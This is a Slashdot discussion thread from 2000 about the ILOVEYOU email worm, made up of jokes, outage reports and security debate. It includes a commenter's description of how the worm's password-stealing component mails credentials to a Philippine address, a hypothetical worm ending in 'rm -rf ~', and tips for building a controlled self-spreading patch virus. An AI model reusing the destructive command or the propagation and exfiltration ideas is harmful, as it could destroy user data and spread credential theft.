    You'll receive it from Outlook users, it'll mess with a variety of filetypes and offer them on mIRC if you've got it installed, but it won't propagate, since it uses

    CreateObject("Outlook.Application")
    to get at the Address book.

    Open source viruses, eh?

    TomV

  • I actually recieved many of the messages. One showed up in my preview pane, but didn't infect my system. Maybe some versions of outlook automatically open the VBScript files and some don't. Can we get some confirmation on this? I'm running Outlook 2k.
  • Hey...I wonder how hard MS is getting hit with this? Or are they smart enough not to deploy Outlook over there corporate net?
  • simply because they've royally pissed off enough technically adept folks and are such a large target - if the DOJ/Courts doesn't take care of their unfair trading practices, the underground assassins will.

    Something along the lines of the devil's dictionary of an absolute monarch: He can do anything he pleases, so long as he pleases the assassins.
  • by Black Parrot (19622) on Thursday May 04, 2000 @05:48AM (#1092715)
    > I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it.

    So, she gets a love letter over a newswire, and that allays her suspicions?

    --
  • From the article:

    Visual Basic files used by webmasters

    I feel that anyone calling themselves a master of the web, but who uses VB, probably has some issues.
  • I quite agree. If you get a message that says "If you get an email that says 'I love you', DON'T OPEN IT!", don't open it!
  • by jbarnett (127033) on Thursday May 04, 2000 @05:52AM (#1092720) Homepage

    There is a really quite simple fix for this, it comes down to basic security that should be praticed at all times. For example, this worm (among others) spreads it's disease though the use of the address book in outlook express.

    This address book contants email addresses that the person enjoys send/receiving email with. You could say, the address contains a list of "freinds" to the user. The best way to fix being "labeled" as a "freind" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.

    Also since this is spread though the use of outlook express, which is an email program. Email programs are used to communicate between to users or person. I can only conclude that communication between humans, in any form is a major security risk and should be stoped.

    The two basic security prinicpals we learned here, is

    1) communication between humans is bad and should not be allowed

    2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communicatioins with you.

  • There is an article [zdnet.co.uk] and already an update [zdnet.co.uk].
  • by Chris Hall (5155) on Thursday May 04, 2000 @06:03AM (#1092732) Homepage
    does anybody know what the MS-BUGFIX.EXE file /does/ anyway?

    I've not looked thoroughly (just a quick look with a disassembler at parts of it), so the following is incomplete, but among other things, it looks as though it can:

    • Remove policies that prevent passwords from getting stored in the registry
    • Watch every 150ms for a window entitled "Connect To", and when found select a checkbox (probably the one to remember passwords, but I've not got DUN installed on this machine, so I can't check)
    • Grab all passwords stored in the registry, plus details of the machine's IP address, and that of any DNS and WINS servers.
    • Connect using SMTP to smtp.super.net.ph, and send these details (and a few more, e.g. username and machine name) to mailme@super.net.ph
    • Do something (not investigated what) with WinFAT32.exe
    • Add policy to disable registry editing
    • Set Internet Explorer's start page to about:blank

    It seems incredibly poorly written. For example, lots of functions return a char* pointing to a local array. Extra padding arrays are added in an attempt to stop the stack from getting overwritten before the value is used.

  • And any Linux user that ran it as root would deserve what (s)he got as a consequence. In the normal case, some user files could get trashed, but the system should still be safe.

    --
  • by Analysis Paralysis (175834) on Thursday May 04, 2000 @06:05AM (#1092735)
    Only got as far as the second line when the paper-clip winked at me and asked "It looks like you're writing a virus. Would you like help?"

    Nice to see some innovation at work here...

    Microsoft: Don't Innovate, Regurgitate!

  • > Hey...I wonder how hard MS is getting hit with this? Or are they smart enough not to deploy Outlook over there corporate net?

    Rename it to DOJDROPSLAWSUIT.doc.vbs and see how long msn.com responds to pings.

    --
  • I work as a sysadmin for EDS (Electronic Data Systems). We got hit by this thing this morning. EDS's solution was pretty harsh. Any e-mail over 10k is getting deleted. Any attachment that pushes a message over 10k is being deleted. Any account sending ANY .vbs file is getting deactivated.

    This damn thing brought down 3 mail servers, and a handful of other servers.

    It's nice to know that something like a mail message can cripple an organization like EDS.
  • Oh, great.

    WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.

    The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.

    The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.

    We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.
  • by Black Parrot (19622) on Thursday May 04, 2000 @06:16AM (#1092746)
    A friend is trying to get permission from her boss to deliberately post a virus on her corporate network one weekend per month. A virus that turns off VB scripting on any machine where it runs.

    --
  • by fooeyploo (150566) on Thursday May 04, 2000 @06:18AM (#1092748)
    Maybe we should begin to consider Outlook as a DDOS tool? It sure seems to be a very effective one.

    --

    Don't throw your computers out the windows. Throw the Windows out of
    your computers.

  • our sendmail Guru put the following in our
    /etc/procmailrc:
    :0
    *Subject: (ILOVEYOU|INEEDYOU)
    /home/mail/virus-slr

    :0c

    of course, you may wish to change the location of the file that all the mails are diverted to.
    This will forward all the emails with the subject of ILOVEYOU or INEEDYOU into the file virus-slr.
    so far - its a 12Mb file!
  • by Peter Millerchip (166655) on Thursday May 04, 2000 @06:26AM (#1092758)
    Moderators, please moderate the parent up! Thanks for posting it, it works great. We've now re-enabled external email and it's bounced about a million virus emails so far...

    Pete.
  • You will need to install the evaluation edition of Dr. Solomons, then the extra virus .sig to get it to work, though, but it's a start. Solutions from your favourite AV vendor should be appearing Real Soon Now.
    Now, here's hoping a benevolent moderator passes by and mods the parent of this up where it belongs.
  • C'mon: users have to take some responsibility. I get viruses sent to me all the time: I don't click on them. Sure, Outlook sucks, but I'm forced to use it at work and I still don't ever have problems with viruses.

    So, add on to your total cost of ownership the stupidity tax: it's non-refundable. And in your calculations, don't forget the opportunity cost of stupidity: if your users got the time Outlook wasted back, they'd have more time simply to figure out some other way to screw up.

  • As another poster said, I couldn't agree more. I got an e-mail about it this morning, and had to look to make sure it had come from a real source (it had) rather than some clueless person paranoid about "viruses"
    Back when Melissa was big, I had a co-worker who got an e-mail from his sister warning about how bad Melissa was, and not to open attachments with whatever subject line Melissa had.
    Upon further inspection, his sister had mailed not only him, but everyone in her address book.
    In other words, out of ignorance or lack of wanting to even think about what she was doing, my co-worker's sister had done the exact same thing as the virus would have.
    I think some more education is in order, when people warning about viruses become more annoying than the viruses themselves.

  • This is on topic, but it's going to take me a bit to get to it. Moderators, have faith :)
    One of the reasons that the government thinks it'd be a good thing to break Microsoft up the way they want to, is that without having an OS division, MS-Apps would do things like port Office to Linux.
    Red Hat, among others, sees this as a good thing, since the #1 reason they get for people not wanting to switch over to linux is "I can't use my (.DOC | .XLS | .PPT) files"
    I think about the porting of Office to Linux and see many others adopting Linux as a result. I then see clueless newbies who run as root all the time opening .DOC attachments in their mail, and having a macro virus attack them.
    And if MS-Apps ports Office over, why not Outlook? Right now, most folks think it's fairly rare to see a virus on Linux. If Microsoft ports Office/Outlook over, and clueless newbies/managers get ahold of it, the scarcity of viruses for Linux will vanish.
    I can see the headlines now: "Melissa ported to Linux!"
    I think I'll stick to Pine :)
  • This does not happen when you are using Sendmail and a regular POP3 or IMAP client

    I don't know... I'm sure at least a couple of mail servers sending this message around are running sendmail :) But you're right it is the mail client's fault.

    I still think the arrogance that it can't happen to us is dangerous. Just wait until someone makes a shell script for Linux that searches your Pine/Elm/whatever address book and spreads itself that way (before finishing with a 'rm -rf ~'). That would be particularaly messy.

  • this from securityfocus.com

    "The virus appears to have originated from the Philippines and has been described by one expert as the 'the most beautifully written virus' he's ever seen. "

    some expert...

  • by bero-rh (98815) <bero.redhat@com> on Thursday May 04, 2000 @06:51AM (#1092795) Homepage
    Hm, now that I got a love letter from my boss, can I sue him for sexual harrassment and make big cash? ;)

    [Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]
  • What worries me, and I like to have this explained, is why people continue to use Outlook.

    That's simple. They work for one of the many corporations whose CIO has been assimilated by Microsoft, resulting in the mandatory use of Microsoft Windows, Office and Exchange. If you use Exchange for a mail server, you need Outlook on the client machines. My company recently "upgraded" from MS Mail to Exchange. The LAN Admins installed Outlook on every user's PC. I asked them why they didn't install some UNIX POP3 servers and save a ton of money. They said the deployment of Exchange was corporate policy, at the highest level.

  • The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
    I'm sure this is true, but the fact that Windows makes so many decisions "for" its users, and that so many of those decisions are plain wrong, is really why this happens.

    Taking a biological view of it, you can see that what many trumpet as "standardization of platform" may create efficiencies for developers, but also for viruses. Any biologist knows that a genetic monoculture is subject to sudden and massive extinction. Imagine a virus that simply and truly wiped disks clean of windows; that it was 100% virulent and contagious; if not for non-windows users, there could be no computers left running. Or take the recent hacking of AboveNet; it was characterized as a denial of service attack, but it wasn't bandwidth flood. It seems to have been something that allowed routers to be taken down; it's easy to see that the severity of the assault would be proportional to the uniformity of their routers.

    Vive la difference or die.

    Boss of nothin. Big deal.
    Son, go get daddy's hard plastic eyes.

  • Maybe we should begin to consider Outlook as a DDOS tool?

    It certainly does seem to be a great DDoS opportunity! Maybe anybody with VBScript knowledge should be locked away as a potential hacker?

    --Jim
  • by Jeremi (14640) on Thursday May 04, 2000 @07:04AM (#1092811) Homepage
    The annoying bit is now the FBI is going to make it their #1 priority to track down the author of this script and charge him with "millions of dollars in damages".


    That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propogate.


    It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...


    Jeremy, your friendly Slashdot anti-M$ zealot

  • by brennan73 (94035) on Thursday May 04, 2000 @07:07AM (#1092813)
    So this morning, I get a fax at work. It's directed at the old network admin, and is like six pages of junk, Windows registry settings and such. I put it aside, with the intention of calling the person later to tell them that he doesn't work here anymore and ask what in the world she sent me.

    Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs . Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)

    -brennan

  • I found this news article only just a few minutes ago...
    WASHINGTON:

    U.S. District Judge Thomas Penfield Jackson has issued a ruling in the Microsoft VS the Department Of Justice case regaring the breakup of Microsoft into 2 or possibly 3 'Baby Bills'.

    Judge Jackson was quoted as saying, "Only moments ago, I received a rather bizaar email from Mr. Gates, titled as "I LOVE YOU" in the subject line. At first, I thought it was perhaps just another plea to 'let [him] innovate', but after opening the attachment, I found myself infected with a virus. I am very upset with Mr. Gates."

    The breakup is to proceed immediatly.
  • Sure writing the script is easy to do. The hard part is to mail it to pine/elm/.. users and get their mailer to automatically execute it when they open their mail. In Outlook this is appearent easy to do. Thats why Outlook is so evil, this current virus seems to execute as soon as the victim opens their mail.

    How anyone could write an application with such a feature is beyond me. Why anyone would willingly install the thing on their machine is also beyond me. Which brings me back to the point of my original post. System admins and IT managers need to be made well aware of what they are getting into when they base their corporate email system on this crap. I work for a large investment bank and our email has been down for over half a day now because of this thing. I can't even guess how much it's costing the firm.
  • Here in my data center, I still sometimes hear the refrain from the mainframers; "but Unix can't handle the I/O!".

    Little do they know that the EMC disk arrays that handle the mainframe storage are all Unix boxes themselves. ;)
  • If you use the preview pane then Outlook does, in fact, "launch" attachments like JPEGs and VB scripts, so all you have to do it click once on the email itself to run this virus. Very user friendly, very virus friendly.
  • There are a few problems with this:

    1 Find me a Linux mail client that automatically executed bash scripts when a letter is opened.

    2 The worst that said script could do is delete files in the users directory (you aren't logged in as root are you?)

    3. Given #2, how would it spread, it cannot modify system files (like sendmail), so the person would have to intentionally send the message.

    So go ahead and write this virus, try to spread it. I bet it goes nowhere.

    Finkployd

  • Caution and warning.

    This trojan will propagate to FAX machines, if the machine is a contact in the Outlook address book.

    It doesn't just eat bandwidth, it eats paper and phone connections too.
  • by / (33804) on Thursday May 04, 2000 @08:23AM (#1092847)
    Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

    You mean they took the obvious step of ceasing to use software whose crappy design makes it specifically vulnerable to this sort of virus? Or do you mean they just engaged in damage control and will still be whacked the next time such a virus comes around?

    No software should be able to edit a registry file or its equivalent without specific permission from an informed user. Period.
  • BE CAREFUL-- a company I used to work for used viral techniques for automatically installing/updating antivirus software and quickly gave up on the idea. It's too easy to "spread" to a system where you don't want to have the fix applied.

    A better solution is to run it as a non-viral application as part of the user's network login.

    If you're dead-set on using viral techniques make sure that the application checks a central server for a blacklist of systems to refrain from infecting, and a whitelist of network addresses to ONLY infect. This will allow you to control its spread. Also-- be sure to include a self-destruct/undo capability triggered by this same server, and include an unambigious string that is easy to add to your virus scanners should it "get away" from you.

    Again, it's really better to avoid doing this at all. Been there.


  • We have 600 PC's at the site I support. So far not one infected computer. I'm certainly glad we're running Notes. Otherwise I'd be running around to 600 PC's today.

    There are users at some of the company's other sites though that have the virus but it appears to be a very small number. As you pointed out, our users were able to receive the e-mail, but it didn't propogate. Outlook can't send e-mail over our network.

    numb
  • by Spasemunki (63473) on Thursday May 04, 2000 @11:33AM (#1092913) Homepage
    Destroys all MP3's on the system, hunh? Looks like Metallica is finally starting to wise up and fight dirty. . .
  • by gad_zuki! (70830) on Thursday May 04, 2000 @12:17PM (#1092927)
    I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?

    What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'
  • by wowbagger (69688) on Thursday May 04, 2000 @05:11PM (#1092991) Homepage Journal
    This is a real quote from Scott Culp, program manager for Microsoft's security response center"
    In this case the virus author chose to target Outlook probably because it gave him better reach. There isn't a security
    vulnerability in Outlook involved in this at all.

    I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.


    I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.

  • According to this UPI Article [vny.com], Manilla Police have identified the Author.
    Of course, this could mean an arrest in 24 hours.
    *Carlos: Exit Stage Right*

    "Geeks, Where would you be without them?"

"A mind is a terrible thing to have leaking out your ears." -- The League of Sadistic Telepaths

Working...